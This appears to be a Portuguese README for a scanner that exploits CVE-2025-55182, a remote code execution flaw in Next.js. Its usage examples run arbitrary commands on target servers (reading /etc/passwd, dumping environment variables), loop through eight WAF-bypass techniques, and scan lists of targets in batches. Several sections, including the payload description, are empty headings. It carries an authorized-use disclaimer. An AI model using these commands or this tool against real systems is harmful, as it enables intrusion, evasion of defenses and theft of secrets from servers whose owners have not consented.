
Scanner automatizado para RCE CVE-2025-55182 em Next.js com 8 técnicas de bypass de WAF, execução de comandos personalizada e modo de detecção somente para teste, para testes de penetração autorizados.
CVE-2025-55182 Scanner Avançado
Ferramenta avançada de teste de penetração para detecção e exploração da vulnerabilidade CVE-2025-55182 em aplicações Next.js
📋 Table of Contents Visão Geral
Recursos
Instalação
Uso
Exemplos
Técnicas de Bypass
Detalhes Técnicos
Aviso Legal
Contribuição
Licença
🔍 Visão Geral CVE-2025-55182 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta aplicações Next.js por meio dos React Server Components. Este scanner oferece uma forma automatizada de detectar e explorar essa vulnerabilidade com várias técnicas de bypass de WAF.
Pontuação CVSS: 9.8 (Crítica)
✨ Recursos
🚀 Instalação Pré-requisitos Python 3.6 ou superior
Gerenciador de pacotes pip
pip install -r requirements.txt
chmod +x scanner.py
Instalação com Docker
# Build Docker image
docker build -t cve-2025-55182-scanner .
# Run with Docker
docker run --rm cve-2025-55182-scanner -h
📖 Uso Uso básico
# Show help
python scanner.py -h
# Test a target
python scanner.py -d http://target.com --test-only
# Execute command
python scanner.py -d http://target.com -c "whoami"
Opções de linha de comando
Opção Descrição Padrão -d, --domain URL do alvo http://localhost:3000 -c, --command Comando a executar id -t, --technique Técnica de bypass (1-8) 1 -p, --proxy Servidor proxy None -k, --insecure Pular verificação SSL False --test-only Apenas testar a vulnerabilidade False -h, --help Exibir mensagem de ajuda N/A
📚 Exemplos Exploração básica
# Test if target is vulnerable
python scanner.py -d http://vulnapp.com --test-only
# Execute simple command
python scanner.py -d http://vulnapp.com -c "id"
# List directory contents
python scanner.py -d https://target.com -c "ls -la" -k
# Read system file
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"
Exemplos de bypass de WAF
# Use Base64 encoding bypass
python scanner.py -d http://target.com -c "uname -a" -t 2
# Use Unicode encoding
python scanner.py -d https://target.com -c "whoami" -t 3 -k
# Use mixed techniques with proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080
# Try all techniques automatically
for i in {1..8}; do
echo "Trying technique $i"
python scanner.py -d http://target.com -c "hostname" -t $i
echo ""
done
Uso avançado
# Test multiple targets from file
for target in $(cat targets.txt); do
echo "Testing $target"
python scanner.py -d $target --test-only
done
# Save output to file
python scanner.py -d http://target.com -c "ifconfig" > output.txt
# Use with Burp Suite proxy
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k
🛡️ Técnicas de Bypass O scanner inclui 8 técnicas diferentes de bypass de WAF:
Cada técnica pode ser selecionada com a flag -t.
🔧 Detalhes Técnicos Contexto da Vulnerabilidade CVE-2025-55182 é uma vulnerabilidade de poluição de protótipo no Next.js que leva à Execução Remota de Código por meio dos React Server Components. A vulnerabilidade permite que atacantes executem comandos arbitrários no servidor.
Estrutura do Payload A ferramenta usa uma requisição multipart/form-data especialmente elaborada com poluição de protótipo para obter RCE:
Método de Detecção O scanner envia requisições especialmente elaboradas e procura por:
⚠️ Aviso Legal IMPORTANTE: USO APENAS LEGAL E ÉTICO
Esta ferramenta é fornecida para:
NÃO USE ESTA FERRAMENTA PARA:
Ao usar esta ferramenta, você concorda em:
🤝 Contribuição Contribuições são bem-vindas! Veja como você pode ajudar:
Relatando Problemas
Contribuições de Código
Solicitações de Recursos Sugira novos recursos por meio das issues do GitHub com o rótulo "enhancement".
📄 Licença Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
MIT License
Copyright (c) 2025
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
🔗 Referências
⭐ Histórico de Estrelas Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!
Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use esta ferramenta de forma ética e legal.